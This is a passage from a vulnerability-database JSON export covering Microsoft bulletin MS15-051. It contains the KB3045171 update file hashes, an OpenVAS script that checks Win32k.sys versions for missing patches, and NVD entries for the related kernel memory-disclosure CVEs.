Panel</span>, click <span class=\"text-base\">System and Security</span>, and then click <span class=\"text-base\">Windows Update</span>. Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-26\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr></table></div></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File information</h2><div class=\"kb-summary-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">File hash information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">SHA1 hash</th><th class=\"sbody-th\">SHA256 hash</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3045171-ia64.msu</td><td class=\"sbody-td\">244587B36D7E82D315268046E73D3419DD603E52</td><td class=\"sbody-td\">AE0F76A5439C521608E5203CBD505E2964F51AC0EB6094E640889C4805B35BAE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3045171-x64.msu</td><td class=\"sbody-td\">A96111F5702B4729B177A696326E8DC9E57098A7</td><td class=\"sbody-td\">24408616430A8B39D4465A9890CC0EB446492C86C3BF4DB4B71304998BC8B811</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3045171-x86.msu</td><td 
class=\"sbody-td\">620EA5CB09E9D2D1C1902FB55140C5C97960B868</td><td class=\"sbody-td\">8006121E38502A58E70E9A85A38B91297AA2345FB95566EBCA1B1823E816B932</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3045171-ia64.msu</td><td class=\"sbody-td\">E118BB9A405DA803A8B23F35B4B8D2740A21258E</td><td class=\"sbody-td\">8630F60B031BB6C0ADCB5462CDB49E519C1E3D389A119BA04B1D164F470E9DA9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3045171-x64.msu</td><td class=\"sbody-td\">7BC15709A49983D14F746E7141EC1EDCDC71ADB5</td><td class=\"sbody-td\">B2A95E83161983805850EA3C06C5F4F5C649544857746C1C38B999DF1909A32E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3045171-x86.msu</td><td class=\"sbody-td\">9AEDF5CEDA7F456ACD15F9FF8E7659D3C7E1DEE9</td><td class=\"sbody-td\">FC59D31BB53729CBF13F5D79A05349E2A6B4197611711AF4E734583F7301B370</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3045171-x64.msu</td><td class=\"sbody-td\">B787644D4D3252D44DB394130C7A9A1ADB6740B2</td><td class=\"sbody-td\">C3F433C272B71C6E81A0D0AF796CA7FB9137F692D3DB32AEACBAC9DEFE24D4B0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3045171-x86.msu</td><td class=\"sbody-td\">027BCB69F530DDCE6BB05187F49213E85C0A18DF</td><td class=\"sbody-td\">672C3FA4D08CAF5448486D36BB25AB0FB3C5DFB958EB5EB3D810D93529E8E62C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3045171-x64.msu</td><td class=\"sbody-td\">71A6AFEF8AD048E56641B97BAAFDA787B98CAA66</td><td class=\"sbody-td\">7408B0330C95961C983E6294AB6AF615FA6EAEF0A12AC2ABFECF58367316E916</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3045171-x86.msu</td><td class=\"sbody-td\">14EA14F7B808B29F452B198429932DFE660E638D</td><td class=\"sbody-td\">50AC479AE83A71A4DDF62F5FBE1F522268F904170C46E75BDD4B4FCAE540CC1C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-ia64-DEU.exe</td><td 
class=\"sbody-td\">4EAEDB9041E2A02F1CBDC397A59D9291BD9085C3</td><td class=\"sbody-td\">7EA950BAEEFBF6A996AD5F8FEEE604F20CE2AAD6295DA8C4FF91588A1F8190B7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-ia64-ENU.exe</td><td class=\"sbody-td\">42C90E2644544FB785C7F1EE4ED904C02B70A2BC</td><td class=\"sbody-td\">184CB189DE4B5E096F175DFBAA1D7F6BD8E961E5E6C51BFBE9E98EBDF217C049</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-ia64-FRA.exe</td><td class=\"sbody-td\">EA8F4577B1F34E781D689F00A51677C529D3A314</td><td class=\"sbody-td\">E99431C93EA155690EF5EFEE6B7EC06B57CBC0B48024036DD53406EC6023A4D1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-ia64-JPN.exe</td><td class=\"sbody-td\">B62B39E06277ACFEF4F900C711BB2E09C657B613</td><td class=\"sbody-td\">9CBEE002B448AF388A7FC95DCE7A4DD2FA1283476B61A5784C0D2553D34AE28C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-CHS.exe</td><td class=\"sbody-td\">7E54E45FD3F668C97F0E830E0F071A1B25502A98</td><td class=\"sbody-td\">7A88289E5F0C92890DD4EA9C85F83CE97A94C527EC477A03C63726AB14B55DEC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-CHT.exe</td><td class=\"sbody-td\">1D8B89C0C3E4717CF7903A7CA5BC2EC351D616F6</td><td class=\"sbody-td\">5E07309D3074AF5A9056BC6A92BD1B0815CBA4188B56FC30517FD7EA53D16FFD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-DEU.exe</td><td class=\"sbody-td\">865584B92193740FFC5CCEDF11FF67D5631A0754</td><td class=\"sbody-td\">B0747CA84CFAC4CF93C5C772867EEAB315A8B1B889FCC41581BE3AE3051A5D3A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-ENU.exe</td><td class=\"sbody-td\">A3129F8EA90CE3F49D432BE087BCB2C086B22728</td><td class=\"sbody-td\">461BB729719E9BC3ABDA29D6D5B4C8D20FBA74FB4CC40F886EFFC4AE100BDC86</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">WindowsServer2003-KB3045171-x64-ESN.exe</td><td class=\"sbody-td\">5882B44F7402796D70B29C34A3757009C74CFA18</td><td class=\"sbody-td\">67B47DA2B1771D514A540DBD07816E3F7EEBE42F20EF82F6AE22CB602964B8BA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-FRA.exe</td><td class=\"sbody-td\">7D710D51407192ABDA507CE58B063A11A73078CD</td><td class=\"sbody-td\">874BC86503FC78DFBE0FFC4896007723525B4FECB987E42CD50B1BF9790A205C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-ITA.exe</td><td class=\"sbody-td\">FF5391B665D3757524795BC261914BA2F398B04F</td><td class=\"sbody-td\">BD86BFA696C0834957B4682DB988F2669BBCE9CB8D968D93740E6130229A7099</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-JPN.exe</td><td class=\"sbody-td\">390441641B45570BA10B05A1685B0A2E53FEFD36</td><td class=\"sbody-td\">DD39E8C4A1B64FB59029D348D0765D2EEBBB8AC6A33AF9C216A1469504F5A08A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-KOR.exe</td><td class=\"sbody-td\">ABD6F0F4BEA723F0CEBFCC7A3355737EB5286C9A</td><td class=\"sbody-td\">46246DF6F98FE753720402F91B85977C3FAB1A38331ACFF0E3029760EAF8D35D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-PTB.exe</td><td class=\"sbody-td\">823AC2F0E5B4A74530AAD2C63BE8255FBA833FDA</td><td class=\"sbody-td\">8F6F3CA8182781D4FFC3006B95BFE79FABE9270526E7FB61A2AE4DEF91A8DB56</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-RUS.exe</td><td class=\"sbody-td\">38A316E1E2837E1A5002ADA9A62D0CC2DD839213</td><td class=\"sbody-td\">32261A4A2974085FD356EE3226A781308D7F58BF8AE7169DC1D8A00EF794880D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-CHS.exe</td><td class=\"sbody-td\">D6DB53026F2372C2179BCCD3D0D78EDC5866843B</td><td 
class=\"sbody-td\">1EC4955C69D1221A9BB1A00111500DA87B17E3628485852B2F1FDAA988F72314</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-CHT.exe</td><td class=\"sbody-td\">3F108F3479A77B0B8775720B7D8364A4BC851D35</td><td class=\"sbody-td\">CF1D664E55F1488D158978C13EC91EF054D648EEA3BC8D3DCA292C7C14349E99</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-CSY.exe</td><td class=\"sbody-td\">7C7014EABA21B8581942712EFED6AB4548D9941D</td><td class=\"sbody-td\">E1509DADD5AB657ED1657A778B4BAED9D1DCB9E83F19C505019CFC50DA3EF510</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-DEU.exe</td><td class=\"sbody-td\">8D18201139A418D03194BF0C02EA2C05367B4C60</td><td class=\"sbody-td\">01584565C6883A091064229E0D8EE4605BAC196670CFC14563DE58E763391B1F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-ENU.exe</td><td class=\"sbody-td\">1EFAA58A56C7A1657D52368FC03C848A0DF02065</td><td class=\"sbody-td\">900D5B475D3627699C96E09FDA9958B635ACD3F3B7F4F5B1ACDEA5E9E50F8167</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-ESN.exe</td><td class=\"sbody-td\">F7B1291B5442570784012A403563802803002EBB</td><td class=\"sbody-td\">EAA5944B515F49E5EC84306675C1B1BB09EF7FC2F21592E553E8CD50251ACCB5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-FRA.exe</td><td class=\"sbody-td\">5BD1F9BD3D0FFB0BFC9DFAAC6CF33E085AB2B1EE</td><td class=\"sbody-td\">5034DDDFC13A61442159626C9E563CF4B5FB6BEADD7C697C4DE597DC24EBCD7C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-HUN.exe</td><td class=\"sbody-td\">71BF31CDD40641B8C5D7E138722BEF89F8F22C58</td><td class=\"sbody-td\">D83F21FEFBF5443FF93D656DF43FC56EF97839DF33E465F79BFBD496CB348FB5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-ITA.exe</td><td 
class=\"sbody-td\">2973B2F02006A8474E111F990908FDCD918509B9</td><td class=\"sbody-td\">6C080F8F350E9D48EE6036815803CE33A056CE5865128FF533EDD73E3D5AAA43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-JPN.exe</td><td class=\"sbody-td\">521FD8869F610211BF7A8037C934B3B35B81F30A</td><td class=\"sbody-td\">26E337842747D3BD051C68B292CC70FE661DEF2408F1DE56B56932B0F39F4DE9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-KOR.exe</td><td class=\"sbody-td\">E941CAD25C216EB06198A765743F66CFB40BAC80</td><td class=\"sbody-td\">40F5BA2AAE85D72BC7AA5EC067787A59AF40E250DB0E8B3493A82945CC8A504F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-NLD.exe</td><td class=\"sbody-td\">81D0F67B3D1A084B30AFFAE04B7604A22FAA82AB</td><td class=\"sbody-td\">4D46B6A5EFAB61529C12FC7D447C0B58E7D9C8D97DC76B044A9730E3777515ED</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-PLK.exe</td><td class=\"sbody-td\">B75CA95EDEF6C502F8CAF8448BEE5B569B97F4B3</td><td class=\"sbody-td\">DEEEC6B0602B946C6DA2A16F591D4682E912450D4521ADD7044F6A5BF07D64B5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-PTB.exe</td><td class=\"sbody-td\">3F2957CBF037CF2D914C39A64ED7EFFB7879422C</td><td class=\"sbody-td\">FF41E5425D91E74DC93D59727F94D7FA31EF30C7AAD11A1D992954AB059482D8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-PTG.exe</td><td class=\"sbody-td\">31658A69D55A28E63EB6AC9EB52BF08CC3FA25F9</td><td class=\"sbody-td\">885D115CF5A98E2B8E32682182E9F714BE1A89BA8A9D06D70C0A0147B932F239</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-RUS.exe</td><td class=\"sbody-td\">070F8DF1DB761134134ADD755B56B7DC51300A24</td><td class=\"sbody-td\">32CF3A5A206E2710D1BF804C6B792468D5A4DEAD729B83E82666EB26EC77784D</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">WindowsServer2003-KB3045171-x86-SVE.exe</td><td class=\"sbody-td\">379F14B4B8154AC0483AB01BD45DD4E678D1378A</td><td class=\"sbody-td\">194036D91AD629359AB3F8FC532649B8CAE41364B06AD7AF6A8B9F0CDBEA5AE6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-TRK.exe</td><td class=\"sbody-td\">1E102AF5B7739DDC6E1C75D56181F8C72CAFC8D0</td><td class=\"sbody-td\">70BF8656007077ABD17E8F0C01F681B55135FB694E2BB8E5E5F22A8B790F2587</td></tr></table></div></div><br/></span></div></div></div></div></body></html>", "edition": 2, "modified": "2015-06-24T22:39:58", "id": "KB3057191", "href": "https://support.microsoft.com/en-us/help/3057191/", "published": "2015-05-12T00:00:00", "title": "MS15-051: Vulnerabilities in Windows kernel-mode drivers could allow information disclosure: May 12, 2015", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-10T19:50:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1676", "CVE-2015-1677", "CVE-2015-1679", "CVE-2015-1678", "CVE-2015-1680"], "description": "This host is missing an important security\n update according to Microsoft Bulletin MS15-051.", "modified": "2020-06-09T00:00:00", "published": "2015-05-13T00:00:00", "id": "OPENVAS:1361412562310805381", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805381", "type": "openvas", "title": "MS Windows Kernel-Mode Driver Privilege Elevation Vulnerability (3045171)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MS Windows Kernel-Mode Driver Privilege Elevation Vulnerability (3045171)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any 
later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805381\");\n script_version(\"2020-06-09T05:48:43+0000\");\n script_cve_id(\"CVE-2015-1676\", \"CVE-2015-1677\", \"CVE-2015-1678\", \"CVE-2015-1679\",\n \"CVE-2015-1680\");\n script_bugtraq_id(74483, 74494, 74495, 74496, 74497);\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 05:48:43 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-05-13 11:36:27 +0530 (Wed, 13 May 2015)\");\n script_name(\"MS Windows Kernel-Mode Driver Privilege Elevation Vulnerability (3045171)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Bulletin MS15-051.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the kernel-mode driver\n leaking private address information during a function call\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to kernel memory contents that contain sensitive\n information about the system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8 x32/x64\n\n - Microsoft Windows Server 
2012/R2\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows 2003 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Vista x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows 7 x32/x64 Service Pack 1 and prior\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/3045171\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS15-051\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2003:3, win2003x64:3, winVista:3, win7:2, win7x64:2,\n win2008:3, win2008r2:2, win8:1, win8x64:1, win2012:1,\n win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Win32k.sys\");\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2003x64:3,win2003:3) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.5615\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\n## Currently not supporting for Vista and Windows Server 2008 64 bit\nif(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_is_less(version:sysVer, 
test_version:\"6.0.6002.19372\") ||\n version_in_range(version:sysVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.23679\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.7601.18834\") ||\n version_in_range(version:sysVer, test_version:\"6.1.7601.22000\", test_version2:\"6.1.7601.23037\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nif(hotfix_check_sp(win8:1, win8x64:1, win2012:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.2.9200.17343\") ||\n version_in_range(version:sysVer, test_version:\"6.2.9200.20000\", test_version2:\"6.2.9200.21456\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\n## Win 8.1 and win2012R2\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.3.9600.17796\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2020-10-03T12:49:48", "description": "The kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow local users to bypass the ASLR protection mechanism via a crafted function call, aka \"Microsoft Windows Kernel Memory Disclosure Vulnerability,\" a different vulnerability than CVE-2015-1677, CVE-2015-1678, CVE-2015-1679, and CVE-2015-1680.", "edition": 3, "cvss3": {}, "published": "2015-05-13T10:59:00", "title": "CVE-2015-1676", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1676"], "modified": "2019-05-13T19:55:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-1676", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1676", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:48", "description": "The kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows 
Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow local users to bypass the ASLR protection mechanism via a crafted function call, aka \"Microsoft Windows Kernel Memory Disclosure Vulnerability,\" a different vulnerability than CVE-2015-1676, CVE-2015-1677, CVE-2015-1678, and CVE-2015-1679.", "edition": 3, "cvss3": {}, "published": "2015-05-13T10:59:00", "title": "CVE-2015-1680", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1680"], "modified": "2019-05-15T17:01:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-1680", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1680", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:48", "description": "The kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow local users to bypass the ASLR protection mechanism via a crafted function call, aka \"Microsoft Windows Kernel Memory Disclosure Vulnerability,\" a different vulnerability than CVE-2015-1676, CVE-2015-1678, CVE-2015-1679, and CVE-2015-1680.", "edition": 3, "cvss3": {}, "published": "2015-05-13T10:59:00", "title": "CVE-2015-1677", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1677"], "modified": "2019-05-13T20:17:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_7:-"], "id": 
